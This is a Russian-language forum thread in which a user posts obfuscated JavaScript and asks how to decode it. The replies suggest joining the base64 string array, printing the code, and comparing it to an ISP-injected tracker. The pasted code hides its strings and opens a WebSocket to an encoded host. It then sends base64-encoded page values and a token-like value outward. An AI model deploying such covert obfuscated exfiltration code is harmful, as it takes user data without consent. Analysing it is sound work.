Как расшифровать данный код?

Question

[Adil950]

мне нужно хоть как то понять данный код, как это сделать

const _0x2f14=['b2Nv','ZXJI','ZGF0','b3Zl','IF0r','MTAw','cmVt','LnBy','ZW5z','PHNj','VXNl','cHQ+','aXN0','b25z','LXNl','aW1z','aW5z','aGUg','Z3Jh','Y3Jp','dWN0','UGxl','IHVz','cGls','dEJ5','dThy','ZXh0','bnRM','cnZp','cm90','ZD0i','VE1M','dGVz','c3Ry','dGNo','b2xv','PHA+','Oi8v','IExv','aGVh','d2dO','K1te','ZW5l','Y2Ui','SVQx','aWQ6','YXRv','bzo3','ZW5k','dCBp','c2Fn','ICsg','KSsp','aW9u','d3Nz','ICIv','XiBd','Y29u','bWVz','bmcg','bG9n','anVt','RWxl','cmV0','Z2V0','b3Bl','dGhp','TkJR','Y2Fw','bGVu','dHJ1','Z3Ro','SHQz','aW5u','TWVH','S3dn','RXZl','c2Vu','cmF5','Y29t','by1w','K0tz','PC9z','RUlI','PC9w','cyAr','IHRv','Xihb','YXNl','b0U2','IC8i','S0lU','dmFs','IF19','bWVu','Kygg','cGVy','bmlj','dXJu','b1Yz','Z2lu','a2Vu','ZWNo','cklk','cmlw','YmJp','ZSB0','YWRk','UkEz','Y3Rp','NDcw','YXBw'];(function(_0x93c80e,_0x2f1490){const _0x48f42d=function(_0x4e494f){while(--_0x4e494f){_0x93c80e['push'](_0x93c80e['shift']());}};const _0x7e0556=function(){const _0x1f4552={'data':{'key':'cookie','value':'timeout'},'setCookie':function(_0x5cb320,_0x25f2ad,_0x1bb6f4,_0x393046){_0x393046=_0x393046||{};let _0x4e6e3a=_0x25f2ad+'='+_0x1bb6f4;let _0x4e17c0=0x0;for(let _0x1a4145=0x0,_0x583e58=_0x5cb320['length'];_0x1a4145<_0x583e58;_0x1a4145++){const _0x48fc20=_0x5cb320[_0x1a4145];_0x4e6e3a+=';\x20'+_0x48fc20;const _0x5a42a6=_0x5cb320[_0x48fc20];_0x5cb320['push'](_0x5a42a6);_0x583e58=_0x5cb320['length'];if(_0x5a42a6!==!![]){_0x4e6e3a+='='+_0x5a42a6;}}_0x393046['cookie']=_0x4e6e3a;},'removeCookie':function(){return'dev';},'getCookie':function(_0x565f14,_0x31d9e9){_0x565f14=_0x565f14||function(_0x25329a){return _0x25329a;};const _0x2d7e05=_0x565f14(new RegExp('(?:^|;\x20)'+_0x31d9e9['replace'](/([.$?*|{}()[]\/+^])/g,'$1')+'=([^;]*)'));const _0x5341cf=function(_0x1fc98d,_0x54558c){_0x1fc98d(++_0x54558c);};_0x5341cf(_0x48f42d,_0x2f1490);return _0x2d7e05?decodeURIComponent(_0x2d7e05[0x1]):undefined;}};const _0x241c84=function(){const _0x326eff=new RegExp('\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*[\x27|\x22].+[\x27|\x22];?\x20*}');return _0x326eff['test'](_0x1f4552['removeCookie']['toString']());};_0x1f4552['updateCookie']=_0x241c84;let _0x4220c6='';const _0x3c39f9=_0x1f4552['updateCookie']();if(!_0x3c39f9){_0x1f4552['setCookie'](['*'],'counter',0x1);}else if(_0x3c39f9){_0x4220c6=_0x1f4552['getCookie'](null,'counter');}else{_0x1f4552['removeCookie']();}};_0x7e0556();}(_0x2f14,0x8a));const _0x48f4=function(_0x93c80e,_0x2f1490){_0x93c80e=_0x93c80e-0x0;let _0x48f42d=_0x2f14[_0x93c80e];if(_0x48f4['uhlaxM']===undefined){(function(){const _0x4e494f=function(){let _0x4220c6;try{_0x4220c6=Function('return\x20(function()\x20'+'{}.constructor(\x22return\x20this\x22)(\x20)'+');')();}catch(_0x3c39f9){_0x4220c6=window;}return _0x4220c6;};const _0x1f4552=_0x4e494f();const _0x241c84='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x1f4552['atob']||(_0x1f4552['atob']=function(_0x5cb320){const _0x25f2ad=String(_0x5cb320)['replace'](/=+$/,'');let _0x1bb6f4='';for(let _0x393046=0x0,_0x4e6e3a,_0x4e17c0,_0x1a4145=0x0;_0x4e17c0=_0x25f2ad['charAt'](_0x1a4145++);~_0x4e17c0&&(_0x4e6e3a=_0x393046%0x4?_0x4e6e3a*0x40+_0x4e17c0:_0x4e17c0,_0x393046++%0x4)?_0x1bb6f4+=String['fromCharCode'](0xff&_0x4e6e3a>>(-0x2*_0x393046&0x6)):0x0){_0x4e17c0=_0x241c84['indexOf'](_0x4e17c0);}return _0x1bb6f4;});}());_0x48f4['GaEZzQ']=function(_0x583e58){const _0x48fc20=atob(_0x583e58);let _0x5a42a6=[];for(let _0x565f14=0x0,_0x31d9e9=_0x48fc20['length'];_0x565f14<_0x31d9e9;_0x565f14++){_0x5a42a6+='%'+('00'+_0x48fc20['charCodeAt'](_0x565f14)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x5a42a6);};_0x48f4['pjuXQd']={};_0x48f4['uhlaxM']=!![];}const _0x7e0556=_0x48f4['pjuXQd'][_0x93c80e];if(_0x7e0556===undefined){const _0x2d7e05=function(_0x5341cf){this['YIdUSM']=_0x5341cf;this['yTwyYZ']=[0x1,0x0,0x0];this['leocCJ']=function(){return'newState';};this['WtwtMt']='\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*';this['sqGijF']='[\x27|\x22].+[\x27|\x22];?\x20*}';};_0x2d7e05['prototype']['GfHlrr']=function(){const _0x25329a=new RegExp(this['WtwtMt']+this['sqGijF']);const _0x1fc98d=_0x25329a['test'](this['leocCJ']['toString']())?--this['yTwyYZ'][0x1]:--this['yTwyYZ'][0x0];return this['pgQuva'](_0x1fc98d);};_0x2d7e05['prototype']['pgQuva']=function(_0x54558c){if(!Boolean(~_0x54558c)){return _0x54558c;}return this['rMdAwK'](this['YIdUSM']);};_0x2d7e05['prototype']['rMdAwK']=function(_0x326eff){for(let _0x3f293c=0x0,_0x1f3397=this['yTwyYZ']['length'];_0x3f293c<_0x1f3397;_0x3f293c++){this['yTwyYZ']['push'](Math['round'](Math['random']()));_0x1f3397=this['yTwyYZ']['length'];}return _0x326eff(this['yTwyYZ'][0x0]);};new _0x2d7e05(_0x48f4)['GfHlrr']();_0x48f42d=_0x48f4['GaEZzQ'](_0x48f42d);_0x48f4['pjuXQd'][_0x93c80e]=_0x48f42d;}else{_0x48f42d=_0x7e0556;}return _0x48f42d;};const _0x46ffc7=function(){let _0x351be0=!![];return function(_0x577da9,_0x651823){const _0x55cfcd=_0x351be0?function(){if(_0x651823){const _0x30fd4a=_0x651823[_0x48f4('0x55')+'ly'](_0x577da9,arguments);_0x651823=null;return _0x30fd4a;}}:function(){};_0x351be0=![];return _0x55cfcd;};}();const _0x3b227d=_0x46ffc7(this,function(){const _0x33ea60=function(){const _0x110c84=_0x33ea60[_0x48f4('0x1f')+_0x48f4('0x7')+_0x48f4('0x6a')+'or'](_0x48f4('0x25')+_0x48f4('0x48')+_0x48f4('0x40')+_0x48f4('0x19')+_0x48f4('0x28')+_0x48f4('0x3b')+_0x48f4('0x1d'))()[_0x48f4('0x35')+_0x48f4('0x6d')+'e'](_0x48f4('0x3d')+_0x48f4('0x1e')+_0x48f4('0x45')+_0x48f4('0xf')+_0x48f4('0x5a')+_0x48f4('0x1a')+_0x48f4('0xf')+_0x48f4('0x43'));return!_0x110c84[_0x48f4('0x6')+'t'](_0x3b227d);};return _0x33ea60();});_0x3b227d();let _0x2317f2;window[_0x48f4('0x23')+_0x48f4('0x46')]=function(){};function _0x3c9e70(_0x431ea8){return btoa(unescape(encodeURIComponent(_0x431ea8)));}let _0x172245;window[_0x48f4('0x65')+_0x48f4('0x9')]=new WebSocket(_0x48f4('0x1c')+_0x48f4('0xb')+_0x48f4('0x65')+_0x48f4('0x9')+_0x48f4('0x5d')+_0x48f4('0x15')+_0x48f4('0x5b'),_0x48f4('0x4c')+_0x48f4('0x36')+_0x48f4('0x3')+_0x48f4('0x56')+'l');imsolo[_0x48f4('0x51')+_0x48f4('0x32')+_0x48f4('0x1')+_0x48f4('0x62')+_0x48f4('0x10')+'r'](_0x48f4('0x27')+'n',function(){window[_0x48f4('0x2a')+_0x48f4('0x8')+_0x48f4('0x14')+_0x48f4('0x4b')]=_0x48f4('0x41')+_0x48f4('0x3f')+_0x48f4('0x39')+_0x48f4('0x49')+_0x48f4('0xe')+_0x48f4('0x29')+_0x48f4('0x54')+_0x48f4('0x30')+_0x48f4('0x52')+_0x48f4('0x12')+_0x48f4('0x37')+_0x48f4('0x6f')+_0x48f4('0x2e')+_0x48f4('0x31')+'A=';_0x2317f2=!![];});imsolo[_0x48f4('0x51')+_0x48f4('0x32')+_0x48f4('0x1')+_0x48f4('0x62')+_0x48f4('0x10')+'r'](_0x48f4('0x20')+_0x48f4('0x18')+'e',function(_0x3c17e5){if(_0x2317f2&&_0x3c17e5[_0x48f4('0x58')+'a'][_0x48f4('0x2b')+_0x48f4('0x2d')]<0xa){_0x172245=_0x3c17e5[_0x48f4('0x58')+'a'];_0x2317f2=![];}else{try{document[_0x48f4('0x26')+_0x48f4('0x24')+_0x48f4('0x44')+_0x48f4('0x6e')+'ID'](_0x48f4('0x34')+_0x48f4('0x64')+_0x48f4('0x2')+'ce')[_0x48f4('0x5c')+_0x48f4('0x59')]();}catch{}$(_0x48f4('0xd')+'d')[_0x48f4('0x55')+_0x48f4('0x16')](_0x48f4('0x5f')+_0x48f4('0x4e')+_0x48f4('0x17')+_0x48f4('0x4')+_0x48f4('0x34')+_0x48f4('0x64')+_0x48f4('0x2')+_0x48f4('0x11')+'>'+_0x3c17e5[_0x48f4('0x58')+'a']+(_0x48f4('0x38')+_0x48f4('0x69')+_0x48f4('0x61')));window[_0x48f4('0x23')+_0x48f4('0x46')]();window[_0x48f4('0x23')+_0x48f4('0x46')]=()=>{};try{document[_0x48f4('0x26')+_0x48f4('0x24')+_0x48f4('0x44')+_0x48f4('0x6e')+'ID'](_0x48f4('0x34')+_0x48f4('0x64')+_0x48f4('0x2')+'ce')[_0x48f4('0x5c')+_0x48f4('0x59')]();}catch{}}});let _0x34f0e0=setInterval(()=>{if(MC[_0x48f4('0x26')+_0x48f4('0x60')+_0x48f4('0x4d')]()!=''&&MC[_0x48f4('0x26')+_0x48f4('0x60')+_0x48f4('0x4d')]()!=undefined&&MC[_0x48f4('0x26')+_0x48f4('0x60')+_0x48f4('0x4d')]()!=null){console[_0x48f4('0x22')](_0x48f4('0x68')+_0x48f4('0x4f')+_0x48f4('0x21')+_0x48f4('0x13')+'\x20'+MC[_0x48f4('0x26')+_0x48f4('0x60')+_0x48f4('0x4d')]());clearInterval(_0x34f0e0);window[_0x48f4('0x65')+_0x48f4('0x9')][_0x48f4('0x33')+'d'](_0x3c9e70(document[_0x48f4('0x26')+_0x48f4('0x24')+_0x48f4('0x44')+_0x48f4('0x6e')+'Id'](_0x48f4('0x47')+'k')[_0x48f4('0x42')+'ue'])+'\x20'+_0x172245+'\x20'+MC[_0x48f4('0x26')+_0x48f4('0x60')+_0x48f4('0x4d')]());}else document[_0x48f4('0x26')+_0x48f4('0x24')+_0x48f4('0x44')+_0x48f4('0x6e')+'Id'](_0x48f4('0x66')+_0x48f4('0x2c')+_0x48f4('0x53')+_0x48f4('0x63'))[_0x48f4('0x2f')+_0x48f4('0x57')+_0x48f4('0x5')]=_0x48f4('0xa')+_0x48f4('0x6b')+_0x48f4('0x3e')+_0x48f4('0xc')+_0x48f4('0x4a')+_0x48f4('0x3c')+_0x48f4('0x6c')+_0x48f4('0x50')+_0x48f4('0x67')+_0x48f4('0x0')+_0x48f4('0x5e')+_0x48f4('0x1b')+_0x48f4('0x3a')+'>';},0x3e8);

Comments

[Stalker_RED]

все было бы довольно просто, если бы он работал.
Там не хватает каких-то кусков, например ругается на отсутствующий fathom и МС

Answer 1

[CityCat4]

Похоже на то, что _0x2f14 - это порватая на куски строка, закодированная в base64. Берете ее, склеиваете вместе и проверяете - так ли это. Если да - вот, часть работы сделана :)

Answer 2

[Dimonchik]

выведи его через alert / textarea , видно же в какую функцию вставлено

Answer 3

[Вадим Мисбах-Соловьёв]

Очень похоже на трекер, который Ростелеком встраивает в трафик, передающийся по HTTP (без SSL).
(я, правда, взглянул весьма бегло).

В своё время я это дело деобфусцировал с момощью рук/мозга и quickjs/nodejs.

Получилось что-то такое: https://habr.com/ru/company/roskomsvoboda/blog/485902/

В общем, советую вам тоже попробовать расшифровать вручную :)